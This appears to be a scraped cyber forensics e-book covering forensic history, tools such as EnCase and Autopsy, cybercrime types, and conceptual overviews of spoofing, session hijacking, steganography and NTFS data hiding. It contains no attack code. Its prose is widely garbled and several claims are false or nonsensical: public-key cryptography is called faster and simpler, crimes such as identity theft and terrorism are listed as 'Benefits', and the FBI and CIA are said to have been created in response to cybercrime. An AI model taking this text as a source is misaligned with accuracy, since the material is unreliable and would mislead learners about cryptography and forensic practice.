Cyber.pdf
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Cyber.pdf as PDF for free.
More details
- Words: 22,185
- Pages: 135
cyber forensics and law ---------------------------------------------------E-BOOK
Page 1 of 135
Page 2 of 135
UNIT - 1 Introduction
Page 3 of 135
Introduction 8/17/2015
scorm content
Introduction to Computer forensics
It is the equivalent of surveying a crime scene performing an autopsy on a victim”. forensic means forum or discussion. Forensic science has a seven types of subdivisions. Application of the Computer forensics is involved with all aspects of an investigation. Benefits are concern a wide range of crimes and disputes, such as fraud and theft.
History Forensic roots from a Latin word, “forensic”. It generally means forum or discussion. Any criminal charged with a crime is presented before an assembly of public folks. Both of the complainant and the defendant are to present their sides through their own speeches.
Forensic science subdivisions & Application Forensic pathology – principles of medicine and determine a cause of death or injury. Forensic accounting – study and interpretation of accounting evidence. Forensic anthropology – the recovery and identification of skeletonized human remains. Forensic archaeology – combination of archaeological techniques and forensic science. Forensic chemistry – detection and identification of illicit drugs, accelerants. Forensic DNA analysis – answer forensic questions such as paternity/maternity testing or placing. Entomology – around human remains to assist in determination of time or location of death. Application: Each subdivisions involving with their own conceptualization. Benefits: To work with different situations and concept of cause.
Computer Forensic Time line 1970s First crimes cases involving computers, mainly financial fraud. 1980’s Norton Utilities, “Unerase” tool was created. SEARCH High Tech Crimes training was created. Regular classes began to be taught to Federal agents in California and at FLETC in Georgia. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/2.html Page 4 of 135
1/2
Introduction 8/17/2015
scorm content
Then HTCIA was formed in Southern California. 1984 FBI Magnetic Media Program was created. Later it became as Computer Analysis and Response Team (CART).
Computer Forensic Time line FBI 1987 Access Data – Cyber Forensic Company formed. 1988 Creation of IACIS, the International Association of Computer Investigative Specialists. In 1993 First International Conference on Computer Evidence held. In 1995 International Organization on Computer Evidence (IOCE) was formed. In 1997 The G8 countries in Moscow declared that “Law enforcement personnel must be trained and equipped to address hightech crimes”. In 1998, G8 appointed IICE to create international principles, guidelines and procedures relating to digital evidence. In 1998 INTERPOL Forensic Science Symposium was held. In 1999 FBI CART case load exceeds 2000 cases, examining 17 terabytes of data. In 2000 First FBI Regional Computer Forensic Laboratory was established. In 2003 FBI CART case load exceeds 6500 cases, examining 782 terabytes of data. Benefits: All the versions of computer forensic update were developed with their previous version.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/2.html Page 5 of 135
2/2
Introduction 8/17/2015
scorm content
Computer forensic & Standards
Whenever possible, do not examine the original media. Write protect the original, copy it, and examine only the copy. Use writes blocking technology to preserve the original. Examination results should be reviewed by a supervisor. All hardware and software should be tested to insure they produce accurate and reliable results. Forensic examiners must remain objective at all times. Application: write blocking technology to preserve the original. Benefits: produce accurate and reliable results.
Basic work The following steps are considered as basic work. Preparation Collection Examination Analysis Reporting Process: “Forensic Computing is the process of identifying, preserving, analyzing and presenting digital evidence in a manner that is legally acceptable. What is Collection: The first phase in the process is to identify, label, record, and acquire data from the possible sources of relevant data. Application: Record the acquire data. What is Examination: Examinations involve forensically processing large amounts of collected data using a combination of automated and manual methods to assess and extract data of particular interest. Application: To assess and extract data. What is Analysis: The next phase of the process is to analyze the results of the examination. It is performed by using legally justifiable methods and techniques. This is done to derive useful information that addresses the questions. This information are useful for performing the collection and examination. Application: To derive useful information from examination. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/3.html Page 6 of 135
1/2
Introduction 8/17/2015
scorm content
What is Reporting: The final phase is reporting the results of the analysis. It may include describing the actions used. It has feature of explaining how tools and procedures were selected. Determination of what other actions need to be performed is the key. Providing recommendations for improvement to policies, guidelines, procedures, tools, and other aspects of the forensic process are also part final phase. Application: Providing recommendations for improvement to policies, guidelines, procedures, tools.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/3.html Page 7 of 135
2/2
Introduction 8/17/2015
scorm content
Introduction to Computer Forensics Investigation
Computer Forensics Investigation: Data recovery Password cracking Online investigation Expert testimony
What is cybercrime? The growing list of cybercrimes includes crimes that have been made possible by computers. They are such as network intrusions and the dissemination of computer viruses. It is also computerbased variations of existing crimes, such as identity theft, stalking, bullying and terrorism. Example: Network intrusions. Application: Dissemination of computer viruses. Benefits: Identity theft, stalking, bullying and terrorism.
Computer crime The computer as a target attacking the computers of others (spreading viruses is an example). The computer as a weapon using a computer to commit "traditional crime" that we see in the physical world (such as fraud or illegal gambling). The computer as an accessory using a computer as a "fancy filing cabinet" to store illegal or stolen information. Example: Spreading viruses. Application: To store illegal or stolen information.
Cybercrime Overview Computer crime refers to any crime that involves a computer and a network. The computer may have been used to carry out the crime for example in the case of stalking. It may be the target for example a Virus. Example: stalking. Benefits: To carry out the crime.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/4.html Page 8 of 135
1/3
Introduction 8/17/2015
scorm content
Examples for cybercrime: June 2012 LinkedIn and Harmony had been attacked. Compromising 65 million passwords. Twitter is hacked. 250,000 passwords are leaked.
Cybercrime types Theft of telecommunications services has occurred. Communications channels were attached to create conspiracy. Telecommunications piracy was done many agents. Sales and investment frauds have happened. Electronic funds transfer fraud were happened. Application: Each types involving with their own conceptualization.
Cybercrime Problem The telecommunications was attached by electronic vandalism. It has paved way for terrorism and extortion. The fraud has continued to steal telecommunications services and piracy. Pornography and other offensive material were occurred. The other areas of fraud were occurred in Telemarketing Electronic fund transfer crime and Electronic money laundering
Job Exists On the other hand many useful things were developed. Separate Law Enforcement was established. As part of development the CIA, FBI were created. The Local Police Department and Sheriff were equipped well with modern equipments. Private sector jobs in Information security was created. Separate cyber tech official jobs were created in companies. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/4.html Page 9 of 135
2/3
Introduction 8/17/2015
scorm content
The accounting firm had new jobs in technology field. The law firm had to get more technical people for handling the technical jobs. The top most power filed of any country is Military. It eventually had to field many technology people. They were doing survey using sophisticated equipments. Many intercepting jobs were created.
Qualities of good investigators There are needs of highest level of ethics. One has to be unbiased. One should have good documentation skills. One should be aware of when to call for help. Application: To help for others at a critical times. Benefits: To make awareness.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/4.html Page 10 of 135
3/3
UNIT - 2 Cyber Forensics Tools and Utilities
Page 11 of 135
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Introduction to Cyber Forensics tools
There are two types of forensics tools. They are Disk imaging software tools. Software or hardware write tools, Hashing tools and primary tools.
Primary Forensic tools: Primary forensic tools are classified to the following types. This encases from Guidance software primary tool. When Encase falls FTK is the second choice. Xways Software Technology is another type of tool. DFF (Digital Forensics Framework) is another type of tool. It can be used in Linux.
Live Forensics: To make simple live forensic, Linux: from forensic distros. Helix: From efenceCain: From cainelive.net. F – Response from www.fresponse.com. FIM tools from system internals. Great free from for live forensics. Live view from sourceforge.net. Application: which can be used as live forensic and booting linen.
Mobile Devices This includes not only mobile phones. Also PDA, IPOD, Video Cameras, Photo Cameras, MP3 Players, etc. XRY and XACT form are very good. But they are very expensive. Device Seizure form Parable nice for PDA examination.
Data Recovery file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/2.html Page 12 of 135
1/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Advanced recovery needs electronic and mechanical parts replacement. PC3000 from ace laboratory HDD and SSD diagnostics are processed through password resetting. RStudio is the first tool to recover any remaining data. FORMOST from foremost.sourceforge.net.CD/DVD Inspector from infinadye CD/DVD examination.
Data Erasing Standard file erasing keeps data intact. The first rules are tough in forensic classes. Data wiping is one of the solution. DBAN from www.dban.org is easiest way to wipe HDD. ERASER from www.eraser.heidi.ie – simple windows apps is also used for erasing data.
Password Recovery The password recovery toolkit is obtained from accessdata.com. And tools is derived from www.elcomsoft.com.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/2.html Page 13 of 135
2/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Coroner′s Toolkit
The Coroner′s Toolkit (or TCT) is a suite of computer security programs. It was discovered by Dan Farmer and wieste Venama. It is used to assist in digital forensic analysis.
ToolkitInstallation Currently the following OS′s are at least semisupported. FreeBSD 24.* Open BSD 2.* BSD/OS 24.* SunOS 45.* Linux 2.* Example: The more recent versions. i.e. after JUNE 24, 2000.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/3.html Page 14 of 135
1/1
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Encase Forensic
Encase is a suite of digital forensics products by Guidance Software. The software comes in several forms. They are designed for forensic, cyber security and ediscovery use. The company also offers Encase training and certification.
Product Line of encase Encase technology is available within a number of products. It currently includes Encase Forensic, Encase Cyber security, Encase eDiscovery, and Encase Portable. Guidance Software also runs training courses and certification.
Features of Encase forensic Encase contains tools for several areas of the digital forensic process. It has tools for acquisition, analysis and reporting. It also includes a scripting facility called Encrypt with various API′s.
Encase Evidence File Format Encase contains functionality to create forensic images of suspect media. Images are stored in proprietary Encase Evidence File Format. The compressible file format is prefixed with case data information. It consists of a bitbybit (i.e. exact) with CRC hashes for every 64K of data. The file format also appends an MD5 hash of the entire drive as footer. Benefits: To create forensic images of suspect media.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/4.html Page 15 of 135
1/1
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Analyst′s Notebook
Analyst′s Notebook is a software product. It was produced from i2 Limited and used for data analysis and investigation. It is a part of the Human Terrain System. US Army program which embeds social scientists with combat brigades. An investigation into fraud in the U.S. Army, are reported to have used Analyst′s Notebook capabilities.
i2 Analyst′s Note book: It offers a rich visual analysis designed to help analysts and their organizations. Large sets of disparate information into highquality, intelligence to help many operations. They are aiding to identify, predict and prevent criminal, terrorist and fraudulent activities.
Analyst′s Notebook Benefits: Quickly identify patterns in Data. Otherwise they will get missed using single analytical approaches. Reduce the time to deliver rich, actionable intelligence. Increase the depth of intelligence for more effective result.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/5.html Page 16 of 135
1/1
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Log Logic′s LX 2000 log analysis tool
Log Logic′s LX 2000 is an excellent log analysis tool. It is powerful and can be distributed. It is a mature and useful product. But it is not for the fainthearted. While its user interface is excellent, it has many hidden capabilities.
Feature log analysis tool Its displays are straightforward. One can perform a wide variety of analyses with relative ease. It is coupled with the ST 3000 largescale storage appliance. The LX 2000 becomes an extremely powerful tool for managing. It is useful for analyzing and archiving huge amounts of data.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/6.html Page 17 of 135
1/1
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Net Witness
Net Witness Corporation was a Reston, Virginiabased network security company. It provides realtime network forensics. It also provides automated threat analysis solutions. In 2011, Net Witness was acquired by EMC Corporation.
Net witness Discovered Net witness’ former CEO, Amit Yoran, was formerly Director of the Department of Homeland Security. He was associated with National Cyber Security division. Net Witness also employed Shawn Carpenter. He is a notable security analyst and he has discovered operation Titan Rain in 2005.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/7.html Page 18 of 135
1/1
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
About MANDIANT
MANDIANT are Engineers, consultants, authors, instructors & security experts. They had chased criminals who were attacking the Fortune 500, govt. contractors, and multi national bank. They responded to over 1 million compromised systems in over 60 organizations. They find evil & solve crime through our products & services.
Network Analysis Identify activities in near RealTime. Detect and collect known malicious network traffic. Perform post Processing and decryption. Describe Attackers Activities and Movement. Determine intent and process of compromise.
Autopsy Autopsy is a user interface. It makes simpler to deploy many of the open source programs. It also can be used in plugins of the Sleuth Kit collection.
Tool design principles The tool should be Extensible Frameworks Ease of Use
Functionality: The user should be able to add new functionality by creating plugins. It can analyze all or part of the underlying data source.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/8.html Page 19 of 135
1/1
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Frame works
The tool will offer some standard approaches for ingesting data. It also offers procedures for analyzing it and reporting any findings. So developers can follow the same design patterns when possible.
Uses The Autopsy Browser must offer the wizards and historical tools. It will make the job easier for users to repeat their steps without excessive reconfiguration.
Fast Autopsy runs background tasks. It does it in parallel using multiple cores and provides results. It may take hours to search the drive. But you will know in minutes.
Cost Effective Autopsy is free of cost. The cost effective digital forensics solutions are essential. Autopsy offers the same core features as other digital forensics tools and offers. Other commercial tools do not provide. Example: Web artifact analysis and registry analysis.
Analysis Modes There are two analysis modes. They are provided below. Dead analysis Live analysis
Dead analysis A dead analysis occurs when a dedicated analysis system is used to examine the data. It does the job from a suspect system. In this Autopsy and The Sleuth Kit are run in a trusted environment, typically in a lab. Autopsy and TSK support raw, Expert Witness, and AFF file formats. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/9.html Page 20 of 135
1/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Live analysis A live analysis occurs when the suspect system is being analyzed while it is running. Autopsy and Sleuth Kit are run from a CD in an un trusted environment. After it is confirmed, the system can be acquired. Then a dead analysis performed.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/9.html Page 21 of 135
2/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Evidence search technique
Search technique: The followings are searching techniques. File Listing File Content Hash Databases File Type Sorting Timeline of File Activity Keyword Search Meta Data Analysis Data Unit Analysis Image Details
File Listing File Listing is defined as Analyze. The files and directories are part of analyze. It includes the names of deleted files and files with Unicodebased names.
File Content File Content is the contents of file. It can be viewed in raw, hex, or the ASCII strings can be extracted. When data is interpreted, Autopsy sanitizes it to prevent damage. Therefore the local analysis system is protected. Autopsy does not use any clientside scripting languages.
Hash Databases Lookup unknown files in a hash database. This will help you to quickly identify it as good or bad. Autopsy uses the NIST National Software Reference Library (NSRL). Its user created databases of known good and known bad files.
File Type Sorting file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/10.html Page 22 of 135
1/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
It is based on their internal signatures to identify files of a known type. Autopsy can also extract only graphic images (including thumbnails). The extension of the file will also be compared to the file type. This will help to identify files that may have had their extension changed to hide them.
File Activity In some cases, timeline of file activity can help identify areas of a file system that may contain evidence. Autopsy can create timelines that contain entries for the Modified, Access, and Change (MAC) times of both allocated and unallocated files.
Keyword Search Keyword searches of the file system image can be performed using ASCII strings and grip regular expressions. Searches can be performed on either the full file system image. An index file can be created for faster searches.
Meta Data Analysis Meta Data structures contain the details about files and directories. Autopsy allows viewing the details of any meta data structure in the file system. Autopsy will search the directories to identify the full path of the file that has allocated the structure. Application: It is useful for recovering deleted content.
Data Unit Analysis Data Units are where the file content is stored. Autopsy allows viewing the contents of any data unit in a variety of formats. It includes ASCII, hexdump, and strings. Autopsy will search the meta data structures to identify which has allocated the data unit.
Image Details File system details can be viewed by images. It is including ondisk layout and times of activity. This mode provides information that is useful during data recovery. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/10.html Page 23 of 135
2/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Case Management
Investigations are organized by cases. It can contain one or more hosts. Each host is configured to have its own time zone setting and clock skew. Each host can contain one or more file system images to analyze. Event Sequencer Notes Image Integrity Reports Logging Open Design Client Server Model
Event Sequencer Timebased events can be added from file activity or IDS and firewall logs. Autopsy sorts the events. So that the sequence of incident events can be more easily determined.
Notes Notes can be saved on a perhost and perinvestigator basis. These allow you to make quick notes about files and structures. The original location can be easily recalled. All notes are stored in an ASCII file.
Image Integrity It is crucial to ensure that files are not modified during analysis. Autopsy, by default, will generate an MD5 value for all files that are imported or created. The integrity of any file that Autopsy uses can be validated at any time.
Reports Autopsy can create ASCII reports for files and other file system structures. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/11.html Page 24 of 135
1/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
This enables to quickly make consistent data sheets during the investigation.
Logging Audit logs are created on a case host and investigator level. So that actions can be easily recalled. The exact Sleuth Kit commands that are executed are also logged.
Open Design The code of Autopsy is open source and all files that it uses are in a raw format. All configuration files are in ASCII text. This makes it easy to export the data and archive it. It also does not restrict from using other tools that may solve the specific problem more appropriately.
Client Server Model Autopsy is HTMLbased. And therefore you do not have to be on the same system as the file system images. This allows multiple investigators to use the same server and connect from their personal systems.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/11.html Page 25 of 135
2/2
UNIT - 3 Concealment Techniques
Page 26 of 135
Concealment Techniques 8/17/2015
scorm content
Spoliation
The spoliation of evidence is the intentional activity. It occurs due to negligent withholding. It happens through hiding and altering of the original structure. It is also destroying of evidence relevant to a legal proceeding.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/2.html Page 27 of 135
1/1
Concealment Techniques 8/17/2015
scorm content
Cryptography
In cryptography, a key is a piece of information (a parameter). It determines that the functional output of a cryptographic algorithm or cipher. Without a key, the algorithm would produce no useful result.
Function of cryptography Cryptography is used to protect email messages, It also preserves credit card information. It helps to protect corporate data.
Classification There are two types of cryptography. They are symmetrickey systems publickey
Publickey cryptography Publickey cryptography is also known as asymmetric cryptography. It refers to a cryptographicalgorithm. It requires two separate keys, One of which is secret (or private) and another one of which is public.
Advantages The main advantages of public key systems are simpler. It is also much faster.
Privatekey cryptography Symmetric encryption is also called privatekey encryption. It gives secretkey encryption. It involves using the same key for encryption and decryption.
Why need secrecy? A key is often easier to protect (it′s typically a small piece of information). It happens better than an encryption algorithm. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/3.html Page 28 of 135
1/2
Concealment Techniques 8/17/2015
scorm content
It is also easier to change if compromised. Application: Protect all kind of personal information.
Scope of key The keys are generated first. They are used with a given suite of algorithms. This setup is called cryptosystem.
Size of key A key length of 80 bits is generally considered. It is the minimum size for strong security. It also has symmetric encryption algorithms. 128bit keys are commonly used and considered very strong.
Key choice To prevent a key from being guessed, keys need to be generated. It is truly having sufficient entropy. The problem of how to safely generate truly random keys is difficult. It has been addressed in many ways by various cryptographic systems.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/3.html Page 29 of 135
2/2
Concealment Techniques 8/17/2015
scorm content
Hashing function
A hash function is any kind of algorithm. It maps data of arbitrary length to data of a fixed length. The values returned by a hash function are called hash values. The other names of hash values are hash codes, hash sums, checksums or simply hashes.
Hash tables Hash functions are primarily used in hash tables. It quickly locates a data record and given its search key. Example: A dictionary definition.
Caches Hash functions are also used to build caches for large data sets stored in slow media. A cache is generally simpler than a hashed search table. Any collision can be resolved by discarding or writing.
Bloom filters Hash functions are an essential ingredient of the Bloom filter. A spaceefficient probabilistic data structure is used to test whether an element is a member of asset.
Hash value A hash value, also called a message digest. It is a number generated from a string of text. The hash value is substantially smaller than the text itself. It is generated by the hash algorithm in such a way that same hash value is negligible.
Hash function algorithms Trivial hash function Perfect hashing Minimal perfect hashing
List of hash functions file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/4.html Page 30 of 135
1/2
Concealment Techniques 8/17/2015
scorm content
NIST hash function competition Pearson hashing Zobrist hashing
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/4.html Page 31 of 135
2/2
Concealment Techniques 8/17/2015
scorm content
Spoofing
A spoofing attack is in the context of network security. A spoofing attack is a situation in which one person or program successfully masquerades as another. It occurs by falsifying data. Then gains an illegitimate advantage.
TCP/IP Many of the protocols in the TCP/IP suite do not provide mechanisms. It will not give specific directions for authenticating the source or destination of a message.
Referrer spoofing Some websites, especially pornographic pay sites, allow access to their materials only from certain approved pages. This is enforced by checking the HTTP request. This referrer header however can be changed is known as "referrer spoofing" or "Reftar spoofing".
Filesharing networks Spoofing can also refer to copyright holder. It happens by placing distorted or unlistenable versions of works on filesharing networks.
Caller ID spoofing Public telephone networks often provide Caller ID information. It includes the caller′s name and number. However some technologies allow callers to forge Caller ID information. Then it presents false names and numbers.
Email address spoofing The sender information shown in emails can be spoofed easily. This technique is commonly used by spammers to hide the origin of their emails. It leads to problems such as misdirected bounces. Example: Email spam backscatter. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/5.html Page 32 of 135
1/2
Concealment Techniques 8/17/2015
scorm content
GPS Spoofing A GPS spoofing attack attempts to deceive a GPS receiver. It happens by broadcasting counterfeit GPS signals. They are structured to resemble a set of normal GPS signals. Or it occurs by rebroadcasting genuine signals captured elsewhere or at a different time.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/5.html Page 33 of 135
2/2
Concealment Techniques 8/17/2015
scorm content
Internet Protocol
The Internet Protocol (IP) is a principal communications protocol. In the Internet protocol suite the data gram’s are relayed across network boundaries. It happens through routing function. It is performed by enabling internet working, and essentially establishes the Internet.
Function of IP The IP is responsible for addressing hosts. It is also for routing datagram’s from a source host to a destination host. It occurs across one or more IP networks. For this purpose, the Internet Protocol defines and provides an addressing system. It has two functions: identifying hosts; and providing a logical location service. Application: Identifying hosts and providing a logical location service.
Datagram Each datagram consists of two components: a header and a payload. The IP header is tagged with the source IP address. The destination IP address, and other metadata are needed to route and deliver the datagram. The payload is the data that is transported.
Capacity and Capability The dynamic nature of the Internet and the diversity of its components provide no guarantee. Therefore any particular path is actually capable or suitable for, performing the data transmission requested.
Reliability Internet Protocol uses the endtoend principle in its design. Under this design, the network infrastructure is assumed in different way. It is assumed to be inherently unreliable at any single network element. Sometimes it is assumed as transmission medium and dynamic in terms of availability of links and nodes.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/6.html Page 34 of 135
1/1
Concealment Techniques 8/17/2015
scorm content
Transmission Control
The TCP stands for Transmission Control Protocol. It is one of the core protocols of the Internet protocol suite (IP). It is so common that the entire suite is called TCP/IP.
Connection The TCP uses three way connection to establish a connection way handshake. SYN SYNACK ACK
SYN The active open is performed by the client. It is by sending a SYN to the server. The client sets the segment′s sequence number to a random value A.
SYNACK The server replies with a SYNACK. The acknowledgment number is set to one more than the received sequence number. i.e. A+1, and the sequence number chooses for the packet is another random number B.
ACK Finally the client sends an ACK back to the server. The sequence number is set to the received acknowledgment value. i.e. A+1, and the acknowledgment number is set to one more than the received sequence number i.e. B+1.
Data transfer Ordered data transfer : The destination host rearranges according to sequence number. Retransmission of lost packets : Any cumulative stream is not acknowledged and re transmitted. Flow control : A sender transfers data to guarantee reliable delivery. The receiver continually hints the sender on how much data can be received. It happens when the receiving host′s buffer fills. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/7.html Page 35 of 135
1/2
Concealment Techniques 8/17/2015
scorm content
Congestion control Benefits: Reliable for how much data can be received.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/7.html Page 36 of 135
2/2
Concealment Techniques 8/17/2015
scorm content
Session hijacking
It is also known as cookie hijacking. The exploitation of a valid computer session, sometimes also called a session key. It is to gain unauthorized access to information or services in a computer system. Methods in hijacking: Session fixation Session side jacking Crosssite scripting
Session fixation Where the attacker sets a user′s session an id. It is done to one to know him. For example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in. Example: by sending the user an email with a link.
Session side jacking Where the attacker uses packet sniffing. It is to read network traffic between two parties. Then it helps to steal the session cookie.
Crosssite scripting Where the attacker tricks the user′s computer into running code. It is treated as trustworthy. Because it appears to be belonging to the server. Benefits: Allowing the attacker to obtain a copy of the cookie.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/8.html Page 37 of 135
1/1
Concealment Techniques 8/17/2015
scorm content
Polymorphism
Polymorphism is the provision of a single interface. It happens in programming languages. It occurs at different entities and types.
Polymorphism described Adhoc polymorphism and parametric polymorphism were originally described in fundamental concepts. In Programming Languages, a set of lecture notes written in 1967. It was written by British computer scientist Christopher Strachey.
Polymorphism types Ad hoc polymorphism Parametric polymorphism Polytypism
Polytypic A polytypic function is more general than polymorphic. And in such a function, "though one can provide fixed ad hoc cases. It happens for specific data types where an adhoc combinatory is absent.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/9.html Page 38 of 135
1/1
Concealment Techniques 8/17/2015
scorm content
Steganography
Steganography is the art or practice of concealing a message. It also hides image, or file. It occurs within another message, image, or file.
About Steganography The word steganography of Greek origin and means "covered writing" or "concealed writing".
Steganography advantage It is plainly visible encrypted messages. It is no matter how unbreakable.
Physical Techniques Hidden messages on messenger′s body also used in ancient Greece. Hidden messages on paper written in secret inks. It is under other messages or on the blank parts of other messages.
Digital Techniques Here the message is concealed within the lowest bits of noisy images. Sometimes it is also concealed sound files. Hiding messages is possible by changing the order of elements in a set.
Applications Steganography is used by some modern printers. It includes HP and Xerox brand colour laser printers.
Methods The following two methods are used to perform stenography. Visual analysis Statistical analysis
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/10.html Page 39 of 135
1/1
Concealment Techniques 8/17/2015
scorm content
Antiforensics
Anticomputer forensics is a general term for a set of techniques. It is used as countermeasures to forensic analysis.
Antiforensic tools In the past antiforensic tools have focused on attacking the forensic process. It happens by destroying data, hiding data, or altering data usage information.
Antiforensic Effectiveness Antiforensic methods rely on several weaknesses in the forensic process. It includes the human element, dependency on tools. It also includes the physical/logical limitations of computers.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/11.html Page 40 of 135
1/1
Concealment Techniques 8/17/2015
scorm content
Cloaking Techniques
Cloaking is a search engine optimization (SEO) technique. In which the content presented to the search engine spider. It is different from that presented to the user′s browser.
Uses of Cloaking Cloaking is often used as a spamdexing technique. It is to try and trick search engines. This helps to give the relevant site a higher ranking.
Data hiding Data hiding is the principle of segregation of the design decisions in a computer program. They are most likely to change. Thus it protects other parts of the program from extensive modification.
Renaming files MSDOS and Windows command line users Microsoft Windows users Linux and Unix users
Data hiding on NTFS To detect and recover data hidden using each of these methods.
Methodology And Tools Tools for hiding data. Runtime’s Disk Explorer for NTFS v2.31. Except for Alternate Data Streams ADS. Tools for restoring data. Windows XP chkdsk and Fsutil. Windows OEM Support Tools NFI. Sleuth Kit 2.02. Foremost 0.69. Come forth 1.00. Also dd, hexedit and strings. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/12.html Page 41 of 135
1/3
Concealment Techniques 8/17/2015
scorm content
Master File Table Every file and every directory has at least one entry in MFT. It is including the MFT itself. Each entry in MFT is called a file record. It has a default fixed size of 1024 bytes. The first 42 bytes are reserved for the MFT entry. Header and the remaining bytes are used to store.
Clusters A data unit in NTFS is called a cluster. It is the smallest disk space allocation unit. Every cluster in NTFS has a Logical Cluster Number (LCN), starting with 0 for the first cluster. Clusters which belong to a file are also assigned a Virtual Cluster Number (VCN).
Meta data files Describe the structure of the file system itself. Microsoft defined 16 standard MFT records (file numbers 0 –15), (some currently unused reserved for future use).
Hiding data in BadClus It happens through. Slipping modifying Logical Block Number (LBN) to physical mapping to skip the defective sector. Remapping. Reallocating LBN from defective area to a spare sector.
Hiding Data in DATA Attribute Hiding Data in Data attribute is possible except the directories and the extension metadata files. Except for BadClus, the content used in NTFS operation. Possible to append some hidden data. DATA attribute is both read and written by NTFS. So the appended data could be overwritten.
NTFS Boot file file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/12.html Page 42 of 135
2/3
Concealment Techniques 8/17/2015
scorm content
This is the only file with a fixed location. It always starts at the first cluster of the file system.
Alternate Data Streams ADSs are a unique feature of NTFS file systems introduced with Windows NT 3.1 (early 1990s). Compatibility between Windows NT servers and Macintosh Clients which use Hierarchical File System (HFS).
At Directory DATA attribute is unnecessary for a directory. Validation checking with chkdsk. When a directory contains a DATA attribute the validation is possible. As a result, the DATA attribute in a directory can be used to hide data Alternate data streams. ISO also be created with directories not just data files to hide data.
Testing NTFS Integrity The chkdsk command any error indicates that the file system could have been Manipulated and left in an unstable state. Standard Windows utility Fsutil or the Sleuth Kit command fastest to obtain general information about NTFS system under investigation.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit3/assets/12.html Page 43 of 135
3/3
UNIT - 4 Hardware: Model System Platforms
Page 44 of 135
Hardware: Model System Platforms 8/17/2015
scorm content
Computer
What is computer? Computer is basically a device. It transforms data into meaningful information. Data can be anything like marks obtained by you in various subjects. It can also be name, age, sex, weight, height, etc. of all the students in a class.
Performance A computer can accept data store data process data as desired retrieve the stored data print the result in desired format
